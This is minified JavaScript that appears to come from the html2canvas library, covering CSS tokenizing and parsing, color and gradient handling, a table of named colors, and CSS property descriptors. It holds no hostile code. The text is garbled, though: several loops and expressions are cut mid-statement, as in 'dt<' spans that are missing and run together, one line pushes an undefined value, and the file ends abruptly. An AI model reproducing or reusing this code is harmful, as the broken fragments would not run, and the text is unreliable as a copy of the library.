tt=this.peekCodePoint(2);if((69===_e||101===_e)&&((43===je||45===je)&&ls(tt)||ls(je)))for(ce.push(this.consumeCodePoint(),this.consumeCodePoint()),ge=8;ls(this.peekCodePoint(0));)ce.push(this.consumeCodePoint());return[V2(ce),ge]},fe.prototype.consumeNumericToken=function(){var ce=this.consumeNumber(),ge=ce[0],_e=ce[1],je=this.peekCodePoint(0),tt=this.peekCodePoint(1),dt=this.peekCodePoint(2);return Pc(je,tt,dt)?{type:15,number:ge,flags:_e,unit:this.consumeName()}:37===je?(this.consumeCodePoint(),{type:16,number:ge,flags:_e}):{type:17,number:ge,flags:_e}},fe.prototype.consumeEscapedCodePoint=function(){var ce=this.consumeCodePoint();if(Ll(ce)){for(var ge=C(ce);Ll(this.peekCodePoint(0))&&ge.length<6;)ge+=C(this.consumeCodePoint());Vm(this.peekCodePoint(0))&&this.consumeCodePoint();var _e=parseInt(ge,16);return 0===_e||function(fe){return fe>=55296&&fe<=57343}(_e)||_e>1114111?65533:_e}return-1===ce?65533:ce},fe.prototype.consumeName=function(){for(var ce="";;){var ge=this.consumeCodePoint();if(Bs(ge))ce+=C(ge);else{if(!od(ge,this.peekCodePoint(0)))return this.reconsumeCodePoint(ge),ce;ce+=C(this.consumeEscapedCodePoint())}}},fe}(),Fr=function(){function fe(ce){this._tokens=ce}return fe.create=function(ce){var ge=new Ot;return ge.write(ce),new fe(ge.read())},fe.parseValue=function(ce){return fe.create(ce).parseComponentValue()},fe.parseValues=function(ce){return fe.create(ce).parseComponentValues()},fe.prototype.parseComponentValue=function(){for(var ce=this.consumeToken();31===ce.type;)ce=this.consumeToken();if(32===ce.type)throw new SyntaxError("Error parsing CSS component value, unexpected EOF");this.reconsumeToken(ce);var ge=this.consumeComponentValue();do{ce=this.consumeToken()}while(31===ce.type);if(32===ce.type)return ge;throw new SyntaxError("Error parsing CSS component value, multiple values found when expecting only one")},fe.prototype.parseComponentValues=function(){for(var ce=[];;){var ge=this.consumeComponentValue();if(32===ge.type)return ce;ce.push(ge),ce.push()}},fe.prototype.consumeComponentValue=function(){var ce=this.consumeToken();switch(ce.type){case 11:case 28:case 2:return this.consumeSimpleBlock(ce.type);case 19:return this.consumeFunction(ce)}return ce},fe.prototype.consumeSimpleBlock=function(ce){for(var ge={type:ce,values:[]},_e=this.consumeToken();;){if(32===_e.type||qu(_e,ce))return ge;this.reconsumeToken(_e),ge.values.push(this.consumeComponentValue()),_e=this.consumeToken()}},fe.prototype.consumeFunction=function(ce){for(var ge={name:ce.value,values:[],type:18};;){var _e=this.consumeToken();if(32===_e.type||3===_e.type)return ge;this.reconsumeToken(_e),ge.values.push(this.consumeComponentValue())}},fe.prototype.consumeToken=function(){var ce=this._tokens.shift();return void 0===ce?Uu:ce},fe.prototype.reconsumeToken=function(ce){this._tokens.unshift(ce)},fe}(),Un=function(fe){return 15===fe.type},ur=function(fe){return 17===fe.type},tn=function(fe){return 20===fe.type},zl=function(fe){return 0===fe.type},ds=function(fe,ce){return tn(fe)&&fe.value===ce},Bm=function(fe){return 31!==fe.type},Wl=function(fe){return 31!==fe.type&&4!==fe.type},xs=function(fe){var ce=[],ge=[];return fe.forEach(function(_e){if(4===_e.type){if(0===ge.length)throw new Error("Error parsing function args, zero tokens for arg");return ce.push(ge),void(ge=[])}31!==_e.type&&ge.push(_e)}),ge.length&&ce.push(ge),ce},qu=function(fe,ce){return 11===ce&&12===fe.type||28===ce&&29===fe.type||2===ce&&3===fe.type},ws=function(fe){return 17===fe.type||15===fe.type},In=function(fe){return 16===fe.type||ws(fe)},a_=function(fe){return fe.length>1?[fe[0],fe[1]]:[fe[0]]},xo={type:17,number:0,flags:4},Vi={type:16,number:50,flags:4},Ia={type:16,number:100,flags:4},wo=function(fe,ce,ge){var _e=fe[0],je=fe[1];return[_n(_e,ce),_n(void 0!==je?je:_e,ge)]},_n=function(fe,ce){if(16===fe.type)return fe.number/100*ce;if(Un(fe))switch(fe.unit){case"rem":case"em":return 16*fe.number;default:return fe.number}return fe.number},Bl_parse=function(fe,ce){if(15===ce.type)switch(ce.unit){case"deg":return Math.PI*ce.number/180;case"grad":return Math.PI/200*ce.number;case"rad":return ce.number;case"turn":return 2*Math.PI*ce.number}throw new Error("Unsupported angle type")},tc=function(fe){return 15===fe.type&&("deg"===fe.unit||"grad"===fe.unit||"rad"===fe.unit||"turn"===fe.unit)},$a=function(fe){switch(fe.filter(tn).map(function(ge){return ge.value}).join(" ")){case"to bottom right":case"to right bottom":case"left top":case"top left":return[xo,xo];case"to top":case"bottom":return ms(0);case"to bottom left":case"to left bottom":case"right top":case"top right":return[xo,Ia];case"to right":case"left":return ms(90);case"to top left":case"to left top":case"right bottom":case"bottom right":return[Ia,Ia];case"to bottom":case"top":return ms(180);case"to top right":case"to right top":case"left bottom":case"bottom left":return[Ia,xo];case"to left":case"right":return ms(270)}return 0},ms=function(fe){return Math.PI*fe/180},Hs_parse=function(fe,ce){if(18===ce.type){var ge=Hm[ce.name];if(void 0===ge)throw new Error('Attempting to parse an unsupported color function "'+ce.name+'"');return ge(fe,ce.values)}if(5===ce.type){if(3===ce.value.length){var _e=ce.value.substring(0,1),je=ce.value.substring(1,2),tt=ce.value.substring(2,3);return ko(parseInt(_e+_e,16),parseInt(je+je,16),parseInt(tt+tt,16),1)}if(4===ce.value.length){_e=ce.value.substring(0,1),je=ce.value.substring(1,2),tt=ce.value.substring(2,3);var dt=ce.value.substring(3,4);return ko(parseInt(_e+_e,16),parseInt(je+je,16),parseInt(tt+tt,16),parseInt(dt+dt,16)/255)}if(6===ce.value.length)return _e=ce.value.substring(0,2),je=ce.value.substring(2,4),tt=ce.value.substring(4,6),ko(parseInt(_e,16),parseInt(je,16),parseInt(tt,16),1);if(8===ce.value.length)return _e=ce.value.substring(0,2),je=ce.value.substring(2,4),tt=ce.value.substring(4,6),dt=ce.value.substring(6,8),ko(parseInt(_e,16),parseInt(je,16),parseInt(tt,16),parseInt(dt,16)/255)}if(20===ce.type){var _t=Nc[ce.value.toUpperCase()];if(void 0!==_t)return _t}return Nc.TRANSPARENT},Oc=function(fe){return 0==(255&fe)},tr=function(fe){var ce=255&fe,ge=255&fe>>8,_e=255&fe>>16,je=255&fe>>24;return ce<255?"rgba("+je+","+_e+","+ge+","+ce/255+")":"rgb("+je+","+_e+","+ge+")"},ko=function(fe,ce,ge,_e){return(fe<<24|ce<<16|ge<<8|Math.round(255*_e)<<0)>>>0},Gd=function(fe,ce){if(17===fe.type)return fe.number;if(16===fe.type){var ge=3===ce?1:255;return 3===ce?fe.number/100*ge:Math.round(fe.number/100*ge)}return 0},rd=function(fe,ce){var ge=ce.filter(Wl);if(3===ge.length){var _e=ge.map(Gd);return ko(_e[0],_e[1],_e[2],1)}if(4===ge.length){var _t=ge.map(Gd);return ko(_t[0],_t[1],_t[2],_t[3])}return 0};function ic(fe,ce,ge){return ge<0&&(ge+=1),ge>=1&&(ge-=1),ge<1/6?(ce-fe)*ge*6+fe:ge<.5?ce:ge<2/3?6*(ce-fe)*(2/3-ge)+fe:fe}var jd=function(fe,ce){var ge=ce.filter(Wl),_e=ge[0],je=ge[1],tt=ge[2],dt=ge[3],_t=(17===_e.type?ms(_e.number):Bl_parse(fe,_e))/(2*Math.PI),gt=In(je)?je.number/100:0,kt=In(tt)?tt.number/100:0,Lt=void 0!==dt&&In(dt)?_n(dt,1):1;if(0===gt)return ko(255*kt,255*kt,255*kt,1);var Ht=kt<=.5?kt*(gt+1):kt+gt-kt*gt,ui=2*kt-Ht,Ki=ic(ui,Ht,_t+1/3),Ni=ic(ui,Ht,_t),Ui=ic(ui,Ht,_t-1/3);return ko(255*Ki,255*Ni,255*Ui,Lt)},Hm={hsl:jd,hsla:jd,rgb:rd,rgba:rd},uo=function(fe,ce){return Hs_parse(fe,Fr.create(ce).parseComponentValue())},Nc={ALICEBLUE:4042850303,ANTIQUEWHITE:4209760255,AQUA:16777215,AQUAMARINE:2147472639,AZURE:4043309055,BEIGE:4126530815,BISQUE:4293182719,BLACK:255,BLANCHEDALMOND:4293643775,BLUE:65535,BLUEVIOLET:2318131967,BROWN:2771004159,BURLYWOOD:3736635391,CADETBLUE:1604231423,CHARTREUSE:2147418367,CHOCOLATE:3530104575,CORAL:4286533887,CORNFLOWERBLUE:1687547391,CORNSILK:4294499583,CRIMSON:3692313855,CYAN:16777215,DARKBLUE:35839,DARKCYAN:9145343,DARKGOLDENROD:3095837695,DARKGRAY:2846468607,DARKGREEN:6553855,DARKGREY:2846468607,DARKKHAKI:3182914559,DARKMAGENTA:2332068863,DARKOLIVEGREEN:1433087999,DARKORANGE:4287365375,DARKORCHID:2570243327,DARKRED:2332033279,DARKSALMON:3918953215,DARKSEAGREEN:2411499519,DARKSLATEBLUE:1211993087,DARKSLATEGRAY:793726975,DARKSLATEGREY:793726975,DARKTURQUOISE:13554175,DARKVIOLET:2483082239,DEEPPINK:4279538687,DEEPSKYBLUE:12582911,DIMGRAY:1768516095,DIMGREY:1768516095,DODGERBLUE:512819199,FIREBRICK:2988581631,FLORALWHITE:4294635775,FORESTGREEN:579543807,FUCHSIA:4278255615,GAINSBORO:3705462015,GHOSTWHITE:4177068031,GOLD:4292280575,GOLDENROD:3668254975,GRAY:2155905279,GREEN:8388863,GREENYELLOW:2919182335,GREY:2155905279,HONEYDEW:4043305215,HOTPINK:4285117695,INDIANRED:3445382399,INDIGO:1258324735,IVORY:4294963455,KHAKI:4041641215,LAVENDER:3873897215,LAVENDERBLUSH:4293981695,LAWNGREEN:2096890111,LEMONCHIFFON:4294626815,LIGHTBLUE:2916673279,LIGHTCORAL:4034953471,LIGHTCYAN:3774873599,LIGHTGOLDENRODYELLOW:4210742015,LIGHTGRAY:3553874943,LIGHTGREEN:2431553791,LIGHTGREY:3553874943,LIGHTPINK:4290167295,LIGHTSALMON:4288707327,LIGHTSEAGREEN:548580095,LIGHTSKYBLUE:2278488831,LIGHTSLATEGRAY:2005441023,LIGHTSLATEGREY:2005441023,LIGHTSTEELBLUE:2965692159,LIGHTYELLOW:4294959359,LIME:16711935,LIMEGREEN:852308735,LINEN:4210091775,MAGENTA:4278255615,MAROON:2147483903,MEDIUMAQUAMARINE:1724754687,MEDIUMBLUE:52735,MEDIUMORCHID:3126187007,MEDIUMPURPLE:2473647103,MEDIUMSEAGREEN:1018393087,MEDIUMSLATEBLUE:2070474495,MEDIUMSPRINGGREEN:16423679,MEDIUMTURQUOISE:1221709055,MEDIUMVIOLETRED:3340076543,MIDNIGHTBLUE:421097727,MINTCREAM:4127193855,MISTYROSE:4293190143,MOCCASIN:4293178879,NAVAJOWHITE:4292783615,NAVY:33023,OLDLACE:4260751103,OLIVE:2155872511,OLIVEDRAB:1804477439,ORANGE:4289003775,ORANGERED:4282712319,ORCHID:3664828159,PALEGOLDENROD:4008225535,PALEGREEN:2566625535,PALETURQUOISE:2951671551,PALEVIOLETRED:3681588223,PAPAYAWHIP:4293907967,PEACHPUFF:4292524543,PERU:3448061951,PINK:4290825215,PLUM:3718307327,POWDERBLUE:2967529215,PURPLE:2147516671,REBECCAPURPLE:1714657791,RED:4278190335,ROSYBROWN:3163525119,ROYALBLUE:1097458175,SADDLEBROWN:2336560127,SALMON:4202722047,SANDYBROWN:4104413439,SEAGREEN:780883967,SEASHELL:4294307583,SIENNA:2689740287,SILVER:3233857791,SKYBLUE:2278484991,SLATEBLUE:1784335871,SLATEGRAY:1887473919,SLATEGREY:1887473919,SNOW:4294638335,SPRINGGREEN:16744447,STEELBLUE:1182971135,TAN:3535047935,TEAL:8421631,THISTLE:3636451583,TOMATO:4284696575,TRANSPARENT:0,TURQUOISE:1088475391,VIOLET:4001558271,WHEAT:4125012991,WHITE:4294967295,WHITESMOKE:4126537215,YELLOW:4294902015,YELLOWGREEN:2597139199},n_={name:"background-clip",initialValue:"border-box",prefix:!1,type:1,parse:function(fe,ce){return ce.map(function(ge){if(tn(ge))switch(ge.value){case"padding-box":return 1;case"content-box":return 2}return 0})}},us={name:"background-color",initialValue:"transparent",prefix:!1,type:3,format:"color"},Is=function(fe,ce){var ge=Hs_parse(fe,ce[0]),_e=ce[1];return _e&&In(_e)?{color:ge,stop:_e}:{color:ge,stop:null}},Gu=function(fe,ce){var ge=fe[0],_e=fe[fe.length-1];null===ge.stop&&(ge.stop=xo),null===_e.stop&&(_e.stop=Ia);for(var je=[],tt=0,dt=0;dttt?gt:tt),tt=gt}else je.push(null)}var kt=null;for(dt=0;dtdt.optimumDistance)?{optimumCorner:_t,optimumDistance:Lt}:dt},{optimumDistance:je?1/0:-1/0,optimumCorner:null}).optimumCorner},ju=function(fe,ce){var ge=ms(180),_e=[];return xs(ce).forEach(function(je,tt){if(0===tt){var dt=je[0];if(20===dt.type&&-1!==["top","left","right","bottom"].indexOf(dt.value))return void(ge=$a(je));if(tc(dt))return void(ge=(Bl_parse(fe,dt)+ms(270))%ms(360))}var _t=Is(fe,je);_e.push(_t)}),{angle:ge,stops:_e,type:1}},U2="closest-side",l0="farthest-side",hc="closest-corner",q2="farthest-corner",G2="ellipse",Q2="contain",Tf=function(fe,ce){var ge=0,_e=3,je=[],tt=[];return xs(ce).forEach(function(dt,_t){var gt=!0;if(0===_t?gt=dt.reduce(function(Lt,Ht){if(tn(Ht))switch(Ht.value){case"center":return tt.push(Vi),!1;case"top":case"left":return tt.push(xo),!1;case"right":case"bottom":return tt.push(Ia),!1}else if(In(Ht)||ws(Ht))return tt.push(Ht),!1;return Lt},gt):1===_t&&(gt=dt.reduce(function(Lt,Ht){if(tn(Ht))switch(Ht.value){case"circle":return ge=0,!1;case G2:return ge=1,!1;case Q2:case U2:return _e=0,!1;case l0:return _e=1,!1;case hc:return _e=2,!1;case"cover":case q2:return _e=3,!1}else if(ws(Ht)||In(Ht))return Array.isArray(_e)||(_e=[]),_e.push(Ht),!1;return Lt},gt)),gt){var kt=Is(fe,dt);je.push(kt)}}),{size:_e,shape:ge,stops:je,position:tt,type:2}},m0_parse=function(fe,ce){if(22===ce.type){var ge={url:ce.value,type:0};return fe.cache.addImage(ce.value),ge}if(18===ce.type){var _e=xf[ce.name];if(void 0===_e)throw new Error('Attempting to parse an unsupported image function "'+ce.name+'"');return _e(fe,ce.values)}throw new Error("Unsupported image type "+ce.type)};for(var xf={"linear-gradient":function(fe,ce){var ge=ms(180),_e=[];return xs(ce).forEach(function(je,tt){if(0===tt){var dt=je[0];if(20===dt.type&&"to"===dt.value)return void(ge=$a(je));if(tc(dt))return void(ge=Bl_parse(fe,dt))}var _t=Is(fe,je);_e.push(_t)}),{angle:ge,stops:_e,type:1}},"-moz-linear-gradient":ju,"-ms-linear-gradient":ju,"-o-linear-gradient":ju,"-webkit-linear-gradient":ju,"radial-gradient":function(fe,ce){var ge=0,_e=3,je=[],tt=[];return xs(ce).forEach(function(dt,_t){var gt=!0;if(0===_t){var kt=!1;gt=dt.reduce(function(Ht,ui){if(kt)if(tn(ui))switch(ui.value){case"center":return tt.push(Vi),Ht;case"top":case"left":return tt.push(xo),Ht;case"right":case"bottom":return tt.push(Ia),Ht}else(In(ui)||ws(ui))&&tt.push(ui);else if(tn(ui))switch(ui.value){case"circle":return ge=0,!1;case G2:return ge=1,!1;case"at":return kt=!0,!1;case U2:return _e=0,!1;case"cover":case l0:return _e=1,!1;case Q2:case hc:return _e=2,!1;case q2:return _e=3,!1}else if(ws(ui)||In(ui))return Array.isArray(_e)||(_e=[]),_e.push(ui),!1;return Ht},gt)}if(gt){var Lt=Is(fe,dt);je.push(Lt)}}),{size:_e,shape:ge,stops:je,position:tt,type:2}},"-moz-radial-gradient":Tf,"-ms-radial-gradient":Tf,"-o-radial-gradient":Tf,"-webkit-radial-gradient":Tf,"-webkit-gradient":function(fe,ce){var ge=ms(180),_e=[],je=1;return xs(ce).forEach(function(gt,kt){var Lt=gt[0];if(0===kt){if(tn(Lt)&&"linear"===Lt.value)return void(je=1);if(tn(Lt)&&"radial"===Lt.value)return void(je=2)}if(18===Lt.type)if("from"===Lt.name){var Ht=Hs_parse(fe,Lt.values[0]);_e.push({stop:xo,color:Ht})}else if("to"===Lt.name)Ht=Hs_parse(fe,Lt.values[0]),_e.push({stop:Ia,color:Ht});else if("color-stop"===Lt.name){var ui=Lt.values.filter(Wl);if(2===ui.length){Ht=Hs_parse(fe,ui[1]);var Ki=ui[0];ur(Ki)&&_e.push({stop:{type:16,number:100*Ki.number,flags:Ki.flags},color:Ht})}}}),1===je?{angle:(ge+ms(180))%ms(360),stops:_e,type:je}:{size:3,shape:0,stops:_e,position:[],type:je}}},$2={name:"background-image",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){if(0===ce.length)return[];var ge=ce[0];return 20===ge.type&&"none"===ge.value?[]:ce.filter(function(_e){return Wl(_e)&&function o_(fe){return!(20===fe.type&&"none"===fe.value||18===fe.type&&!xf[fe.name])}(_e)}).map(function(_e){return m0_parse(fe,_e)})}},LM={name:"background-origin",initialValue:"border-box",prefix:!1,type:1,parse:function(fe,ce){return ce.map(function(ge){if(tn(ge))switch(ge.value){case"padding-box":return 1;case"content-box":return 2}return 0})}},K2={name:"background-position",initialValue:"0% 0%",type:1,prefix:!1,parse:function(fe,ce){return xs(ce).map(function(ge){return ge.filter(In)}).map(a_)}},Qd={name:"background-repeat",initialValue:"repeat",prefix:!1,type:1,parse:function(fe,ce){return xs(ce).map(function(ge){return ge.filter(tn).map(function(_e){return _e.value}).join(" ")}).map(u0)}},u0=function(fe){switch(fe){case"no-repeat":return 1;case"repeat-x":case"repeat no-repeat":return 2;case"repeat-y":case"no-repeat repeat":return 3;default:return 0}},sa=(()=>{return(fe=sa||(sa={})).AUTO="auto",fe.CONTAIN="contain",fe.COVER="cover",sa;var fe})(),h0={name:"background-size",initialValue:"0",prefix:!1,type:1,parse:function(fe,ce){return xs(ce).map(function(ge){return ge.filter(f0)})}},f0=function(fe){return tn(fe)||In(fe)},wf=function(fe){return{name:"border-"+fe+"-color",initialValue:"transparent",prefix:!1,type:3,format:"color"}},p0=wf("top"),r_=wf("right"),X2=wf("bottom"),If=wf("left"),Qu=function(fe){return{name:"border-radius-"+fe,initialValue:"0 0",prefix:!1,type:1,parse:function(ce,ge){return a_(ge.filter(In))}}},fc=Qu("top-left"),s_=Qu("top-right"),Y2=Qu("bottom-right"),c_=Qu("bottom-left"),Rf=function(fe){return{name:"border-"+fe+"-style",initialValue:"solid",prefix:!1,type:2,parse:function(ce,ge){switch(ge){case"none":return 0;case"dashed":return 2;case"dotted":return 3;case"double":return 4}return 1}}},l_=Rf("top"),Ar=Rf("right"),J2=Rf("bottom"),zM=Rf("left"),$d=function(fe){return{name:"border-"+fe+"-width",initialValue:"0",type:0,prefix:!1,parse:function(ce,ge){return Un(ge)?ge.number:0}}},pc=$d("top"),Z2=$d("right"),d_=$d("bottom"),Lc=$d("left"),hs={name:"color",initialValue:"transparent",prefix:!1,type:3,format:"color"},$u={name:"direction",initialValue:"ltr",prefix:!1,type:2,parse:function(fe,ce){return"rtl"===ce?1:0}},Um={name:"display",initialValue:"inline-block",prefix:!1,type:1,parse:function(fe,ce){return ce.filter(tn).reduce(function(ge,_e){return ge|eC(_e.value)},0)}},eC=function(fe){switch(fe){case"block":case"-webkit-box":return 2;case"inline":return 4;case"run-in":return 8;case"flow":return 16;case"flow-root":return 32;case"table":return 64;case"flex":case"-webkit-flex":return 128;case"grid":case"-ms-grid":return 256;case"ruby":return 512;case"subgrid":return 1024;case"list-item":return 2048;case"table-row-group":return 4096;case"table-header-group":return 8192;case"table-footer-group":return 16384;case"table-row":return 32768;case"table-cell":return 65536;case"table-column-group":return 131072;case"table-column":return 262144;case"table-caption":return 524288;case"ruby-base":return 1048576;case"ruby-text":return 2097152;case"ruby-base-container":return 4194304;case"ruby-text-container":return 8388608;case"contents":return 16777216;case"inline-block":return 33554432;case"inline-list-item":return 67108864;case"inline-table":return 134217728;case"inline-flex":return 268435456;case"inline-grid":return 536870912}return 0},Rs={name:"float",initialValue:"none",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"left":return 1;case"right":return 2;case"inline-start":return 3;case"inline-end":return 4}return 0}},m_={name:"letter-spacing",initialValue:"0",prefix:!1,type:0,parse:function(fe,ce){return 20===ce.type&&"normal"===ce.value?0:17===ce.type||15===ce.type?ce.number:0}},sd=(()=>{return(fe=sd||(sd={})).NORMAL="normal",fe.STRICT="strict",sd;var fe})(),Ua={name:"line-break",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){return"strict"===ce?sd.STRICT:sd.NORMAL}},u_={name:"line-height",initialValue:"normal",prefix:!1,type:4},tC=function(fe,ce){return tn(fe)&&"normal"===fe.value?1.2*ce:17===fe.type?ce*fe.number:In(fe)?_n(fe,ce):ce},h_={name:"list-style-image",initialValue:"none",type:0,prefix:!1,parse:function(fe,ce){return 20===ce.type&&"none"===ce.value?null:m0_parse(fe,ce)}},iC={name:"list-style-position",initialValue:"outside",prefix:!1,type:2,parse:function(fe,ce){return"inside"===ce?0:1}},Sf={name:"list-style-type",initialValue:"none",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"disc":return 0;case"circle":return 1;case"square":return 2;case"decimal":return 3;case"cjk-decimal":return 4;case"decimal-leading-zero":return 5;case"lower-roman":return 6;case"upper-roman":return 7;case"lower-greek":return 8;case"lower-alpha":return 9;case"upper-alpha":return 10;case"arabic-indic":return 11;case"armenian":return 12;case"bengali":return 13;case"cambodian":return 14;case"cjk-earthly-branch":return 15;case"cjk-heavenly-stem":return 16;case"cjk-ideographic":return 17;case"devanagari":return 18;case"ethiopic-numeric":return 19;case"georgian":return 20;case"gujarati":return 21;case"gurmukhi":case"hebrew":return 22;case"hiragana":return 23;case"hiragana-iroha":return 24;case"japanese-formal":return 25;case"japanese-informal":return 26;case"kannada":return 27;case"katakana":return 28;case"katakana-iroha":return 29;case"khmer":return 30;case"korean-hangul-formal":return 31;case"korean-hanja-formal":return 32;case"korean-hanja-informal":return 33;case"lao":return 34;case"lower-armenian":return 35;case"malayalam":return 36;case"mongolian":return 37;case"myanmar":return 38;case"oriya":return 39;case"persian":return 40;case"simp-chinese-formal":return 41;case"simp-chinese-informal":return 42;case"tamil":return 43;case"telugu":return 44;case"thai":return 45;case"tibetan":return 46;case"trad-chinese-formal":return 47;case"trad-chinese-informal":return 48;case"upper-armenian":return 49;case"disclosure-open":return 50;case"disclosure-closed":return 51;default:return-1}}},Ku=function(fe){return{name:"margin-"+fe,initialValue:"0",prefix:!1,type:4}},f_=Ku("top"),qm=Ku("right"),bi=Ku("bottom"),Rn=Ku("left"),be={name:"overflow",initialValue:"visible",prefix:!1,type:1,parse:function(fe,ce){return ce.filter(tn).map(function(ge){switch(ge.value){case"hidden":return 1;case"scroll":return 2;case"clip":return 3;case"auto":return 4;default:return 0}})}},Me={name:"overflow-wrap",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){return"break-word"===ce?"break-word":"normal"}},or=function(fe){return{name:"padding-"+fe,initialValue:"0",prefix:!1,type:3,format:"length-percentage"}},kf=or("top"),Kd=or("right"),_c=or("bottom"),Xu=or("left"),Yu={name:"text-align",initialValue:"left",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"right":return 2;case"center":case"justify":return 1;default:return 0}}},p_={name:"position",initialValue:"static",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"relative":return 1;case"absolute":return 2;case"fixed":return 3;case"sticky":return 4}return 0}},_0={name:"text-shadow",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){return 1===ce.length&&ds(ce[0],"none")?[]:xs(ce).map(function(ge){for(var _e={color:Nc.TRANSPARENT,offsetX:xo,offsetY:xo,blur:xo},je=0,tt=0;tt{return(fe=Gm||(Gm={})).NORMAL="normal",fe.BREAK_ALL="break-all",fe.KEEP_ALL="keep-all",Gm;var fe})(),nC={name:"word-break",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"break-all":return Gm.BREAK_ALL;case"keep-all":return Gm.KEEP_ALL;default:return Gm.NORMAL}}},__={name:"z-index",initialValue:"auto",prefix:!1,type:0,parse:function(fe,ce){if(20===ce.type)return{auto:!0,order:0};if(ur(ce))return{auto:!1,order:ce.number};throw new Error("Invalid z-index number parsed")}},Pf={name:"time",parse:function(fe,ce){if(15===ce.type)switch(ce.unit.toLowerCase()){case"s":return 1e3*ce.number;case"ms":return ce.number}throw new Error("Unsupported time type")}},ld={name:"opacity",initialValue:"1",type:0,prefix:!1,parse:function(fe,ce){return ur(ce)?ce.number:1}},g_={name:"text-decoration-color",initialValue:"transparent",prefix:!1,type:3,format:"color"},zc={name:"text-decoration-line",initialValue:"none",prefix:!1,type:1,parse:function(fe,ce){return ce.filter(tn).map(function(ge){switch(ge.value){case"underline":return 1;case"overline":return 2;case"line-through":return 3;case"none":return 4}return 0}).filter(function(ge){return 0!==ge})}},M0={name:"font-family",initialValue:"",prefix:!1,type:1,parse:function(fe,ce){var ge=[],_e=[];return ce.forEach(function(je){switch(je.type){case 20:case 0:ge.push(je.value);break;case 17:ge.push(je.number.toString());break;case 4:_e.push(ge.join(" ")),ge.length=0}}),ge.length&&_e.push(ge.join(" ")),_e.map(function(je){return-1===je.indexOf(" ")?je:"'"+je+"'"})}},C_={name:"font-size",initialValue:"0",prefix:!1,type:3,format:"length"},y_={name:"font-weight",initialValue:"normal",type:0,prefix:!1,parse:function(fe,ce){return ur(ce)?ce.number:tn(ce)&&"bold"===ce.value?700:400}},v0={name:"font-variant",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){return ce.filter(tn).map(function(ge){return ge.value})}},A0={name:"font-style",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"oblique":return"oblique";case"italic":return"italic";default:return"normal"}}},Tr=function(fe,ce){return 0!=(fe&ce)},b_={name:"content",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){if(0===ce.length)return[];var ge=ce[0];return 20===ge.type&&"none"===ge.value?[]:ce}},oC={name:"counter-increment",initialValue:"none",prefix:!0,type:1,parse:function(fe,ce){if(0===ce.length)return null;var ge=ce[0];if(20===ge.type&&"none"===ge.value)return null;for(var _e=[],je=ce.filter(Bm),tt=0;tt1?1:0],this.overflowWrap=ji(ce,Me,ge.overflowWrap),this.paddingTop=ji(ce,kf,ge.paddingTop),this.paddingRight=ji(ce,Kd,ge.paddingRight),this.paddingBottom=ji(ce,_c,ge.paddingBottom),this.paddingLeft=ji(ce,Xu,ge.paddingLeft),this.paintOrder=ji(ce,sC,ge.paintOrder),this.position=ji(ce,p_,ge.position),this.textAlign=ji(ce,Yu,ge.textAlign),this.textDecorationColor=ji(ce,g_,null!==(_e=ge.textDecorationColor)&&void 0!==_e?_e:ge.color),this.textDecorationLine=ji(ce,zc,null!==(je=ge.textDecorationLine)&&void 0!==je?je:ge.textDecoration),this.textShadow=ji(ce,_0,ge.textShadow),this.textTransform=ji(ce,aC,ge.textTransform),this.transform=ji(ce,g0,ge.transform),this.transformOrigin=ji(ce,y0,ge.transformOrigin),this.visibility=ji(ce,b0,ge.visibility),this.webkitTextStrokeColor=ji(ce,ln,ge.webkitTextStrokeColor),this.webkitTextStrokeWidth=ji(ce,cC,ge.webkitTextStrokeWidth),this.wordBreak=ji(ce,nC,ge.wordBreak),this.zIndex=ji(ce,__,ge.zIndex)}return fe.prototype.isVisible=function(){return this.display>0&&this.opacity>0&&0===this.visibility},fe.prototype.isTransparent=function(){return Oc(this.backgroundColor)},fe.prototype.isTransformed=function(){return null!==this.transform},fe.prototype.isPositioned=function(){return 0!==this.position},fe.prototype.isPositionedWithZIndex=function(){return this.isPositioned()&&!this.zIndex.auto},fe.prototype.isFloating=function(){return 0!==this.float},fe.prototype.isInlineLevel=function(){return Tr(this.display,4)||Tr(this.display,33554432)||Tr(this.display,268435456)||Tr(this.display,536870912)||Tr(this.display,67108864)||Tr(this.display,134217728)},fe}(),dC=function fe(ce,ge){this.content=ji(ce,b_,ge.content),this.quotes=ji(ce,hl,ge.quotes)},Ju=function fe(ce,ge){this.counterIncrement=ji(ce,oC,ge.counterIncrement),this.counterReset=ji(ce,rC,ge.counterReset)},ji=function(fe,ce,ge){var _e=new Ot,je=null!=ge?ge.toString():ce.initialValue;_e.write(je);var tt=new Fr(_e.read());switch(ce.type){case 2:var dt=tt.parseComponentValue();return ce.parse(fe,tn(dt)?dt.value:ce.initialValue);case 0:return ce.parse(fe,tt.parseComponentValue());case 1:return ce.parse(fe,tt.parseComponentValues());case 4:return tt.parseComponentValue();case 3:switch(ce.format){case"angle":return Bl_parse(fe,tt.parseComponentValue());case"color":return Hs_parse(fe,tt.parseComponentValue());case"image":return m0_parse(fe,tt.parseComponentValue());case"length":var _t=tt.parseComponentValue();return ws(_t)?_t:xo;case"length-percentage":var gt=tt.parseComponentValue();return In(gt)?gt:xo;case"time":return Pf.parse(fe,tt.parseComponentValue())}}},Of=function(fe,ce){var ge=function(fe){switch(fe.getAttribute("data-html2canvas-debug")){case"all":return 1;case"clone":return 2;case"parse":return 3;case"render":return 4;default:return 0}}(fe);return 1===ge||ce===ge},fl=function fe(ce,ge){this.context=ce,this.textNodes=[],this.elements=[],this.flags=0,Of(ge,3),this.styles=new lC(ce,window.getComputedStyle(ge,null)),Hi(ge)&&(this.styles.animationDuration.some(function(_e){return _e>0})&&(ge.style.animationDuration="0s"),null!==this.styles.transform&&(ge.style.transform="none")),this.bounds=$(this.context,ge),Of(ge,4)&&(this.flags|=16)},dd="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",eh="undefined"==typeof Uint8Array?[]:new Uint8Array(256),ks=0;ks=0){if(ce<55296||ce>56319&&ce<=65535)return 